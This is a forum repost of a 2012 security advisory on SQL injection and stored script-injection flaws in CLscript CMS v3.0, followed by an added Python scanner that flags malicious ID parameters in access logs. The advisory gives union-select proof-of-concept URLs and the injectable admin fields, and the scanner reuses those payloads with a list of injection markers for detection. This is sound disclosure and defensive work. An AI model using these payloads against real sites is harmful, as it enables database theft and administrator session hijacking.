我不是真正德快乐 posted on 2012-7-7 17:48:44

CLscript CMS v3.0: description of multiple vulnerabilities and how to fix them

CLscript CMS v3.0 - Multiple Web Vulnerabilities

Affected version: 8.6

Product introduction:
=============
With the professionally developed classified portal CLscript 3.0, visitors can post classifieds and use many new features. The classifieds software is search-engine friendly, to gain better promotion at search engines. The whole structure is manageable through an easy-to-use admin panel. In developing the classified software, we have geared ourselves to the most successful classifieds sites on the Internet. You can generate real income from your classifieds website.

See the official website for more.

Abstract
=========
Multiple vulnerabilities have been found in the CLscript v3.0 Content Management System.

Affected products:
==================
CLscript COM
Product: CLscript Classified Software v3.0

Technical details:
========
1.1
Multiple SQL injections

The vulnerability allows a remote attacker to inject/execute their own SQL commands on the affected application's DBMS. The vulnerabilities are located in the userDetail.php, advertise_detail.php and land.php files, bound to the vulnerable pid, rid and id parameters. Successful exploitation of the vulnerability results in DBMS, service & application compromise.

Vulnerable File(s):
[+] userDetail.php
[+] advertise_detail.php
[+] land.php

Vulnerable Module(s):
[+] land
[+] pageDetail
[+] enquiry_detail
[+] userDetail
[+] advertise_detail
[+] config_id

Vulnerable Parameter(s):
[+] rID
[+] ID
[+] pID
[+] faq_id
[+] sp_id
[+] config_id

1.2
Multiple persistent input validation vulnerabilities have been detected in the CLscript v3.0 Content Management System. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).

The input validation vulnerabilities are located in the topic, new word, subcategory, add a new help, add currency and add new FAQ modules. Remote attackers can inject script code into the vulnerable modules by injecting malicious tags as titles, descriptions, word names, category names, currency codes or questions. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction & a privileged user account.

Vulnerable Module(s):
[+] Topic
[+] New word
[+] Subcategory
[+] Add a new help
[+] Add currency (Symbol - Currency code)
[+] Add new FAQ (Question)

Vulnerable Parameter(s):
[+] (title - description)
[+] (word name)
[+] (category name)
[+] (name)
[+] (symbol - currency code)
[+] (question)

Proof of concept:
=================
1.1
The SQL injection vulnerabilities can be exploited by remote attackers without a privileged user account or user interaction. For demonstration or reproduction ...

PoC:
http:// //land.php?file=edit_config&config_id=1'+order+by+1--%20-
http://n1.127.0.0.1:1338//land.php?file=edit_config&config_id=-1'+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--%20-
http://n1.127.0.0.1:1338//pageDetail.php?pid=-1'+union+select+1,version(),3,4,5,6,7--%20-
http://n1.127.0.0.1:1338//land.php?file=edit_diycontent&pid=5'
http://n1.127.0.0.1:1338//enquiry_detail.php?rID=-20'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--%20-
http://n1.127.0.0.1:1338//land.php?file=add_edit_spam_words&sp_id=45'
http:// //land.php?file=catalog&parentId=608
http://n1.127.0.0.1:1338//userDetail.php?id=487
http://n1.127.0.0.1:1338//advertise_detail.php?id=77
http://n1.127.0.0.1:1338//land.php?file=edit_faq&faq_id=24

1.2
The persistent input validation vulnerabilities can be exploited by remote attackers with a local low-privileged user account and low required user interaction. For demonstration or reproduction ...

PoC:
1) http://n1.127.0.0.1:1338//land.php?file=manage_forum
   create topic (title - description is injectable)
2) http://n1.127.0.0.1:1338//land.php?file=manage_spam_words
   add a new word (word is injectable)
3) http://n1.127.0.0.1:1338//land.php?file=catalog&parentId=608
   add subcategory (category name is injectable)
4) http://n1.127.0.0.1:1338//land.php?file=manage_help
   add a new help
5) http://n1.127.0.0.1:1338//land.php?file=manage_currencie
   add currency (Symbol - Currency code is injectable)
6) http://n1.127.0.0.1:1338//land.php?file=manage_faq
   add new FAQ (Question is injectable)

Risk
=====
1.1
The security risk of the SQL injection vulnerabilities is estimated as critical.

1.2
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com
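A defender-side check, added here and not part of the advisory or of CLscript: every parameter the advisory lists as injectable (config_id, pid, rID, sp_id, id, faq_id, parentId) is an integer ID, so a request to one of the named scripts carrying a non-integer value in such a parameter is worth an alert regardless of the exact payload. The access-log lines, the 192.0.2.x client addresses and the marker list are constructed for illustration and are not a complete signature.

```python
"""Added example: flag requests to the CLscript endpoints named in the advisory whose
integer ID parameters carry anything other than a plain integer (constructed input)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Script -> ID parameters the advisory lists for it (lower-cased for matching).
# In normal use each is a plain integer, so any other shape is suspect.
WATCHED_PARAMS = {"land.php": {"config_id", "pid", "sp_id", "faq_id", "parentid"},
                  "pagedetail.php": {"pid"}, "enquiry_detail.php": {"rid"},
                  "userdetail.php": {"id"}, "advertise_detail.php": {"id"}}
# Tokens that have no business inside an integer ID; reported to explain a hit.
SQLI_MARKERS = ("'", " union ", " select ", " order by ", "--", "/*", "information_schema")
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

# Constructed access-log lines modelled on the advisory's PoC URLs, not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Jul/2012:17:48:44 +0800] "GET /userDetail.php?id=487 HTTP/1.1" 200 5120
192.0.2.11 - - [07/Jul/2012:17:49:01 +0800] "GET /land.php?file=edit_config&config_id=1'+order+by+1--%20- HTTP/1.1" 200 5300
192.0.2.11 - - [07/Jul/2012:17:49:05 +0800] "GET /pageDetail.php?pid=-1'+union+select+1,version(),3,4,5,6,7--%20- HTTP/1.1" 200 4800
192.0.2.12 - - [07/Jul/2012:17:50:12 +0800] "GET /land.php?file=add_edit_spam_words&sp_id=45' HTTP/1.1" 500 312
192.0.2.13 - - [07/Jul/2012:17:51:00 +0800] "GET /advertise_detail.php?id=77 HTTP/1.1" 200 6100
"""


def inspect_request(request_target):
    """Return (script, param, reason) findings for one request target (path + query)."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    watched = WATCHED_PARAMS.get(script, set())
    findings = []
    # parse_qsl already turns '+' and %20 into spaces, i.e. what PHP sees in $_GET.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = value.lower()
        if name.lower() not in watched or value.lstrip("-").isdigit():
            continue  # not an ID parameter, or a plain (possibly negative) integer
        hits = [m.strip() for m in SQLI_MARKERS if m in value]
        reason = "sqli markers: " + ", ".join(hits) if hits else "non-numeric id"
        findings.append((script, name, reason))
    return findings


def scan_log(text):
    """Apply inspect_request to every parsable line; return (client, script, param, reason)."""
    results = []
    for line in text.splitlines():
        match = LOG_LINE.match(line)
        if match:
            client, target = match.groups()
            results.extend((client,) + f for f in inspect_request(target))
    return results
```

Because the rule keys on the parameter's expected type rather than on payload keywords, encoded or obfuscated variants of the PoC strings are still flagged as "non-numeric id" even when no marker matches.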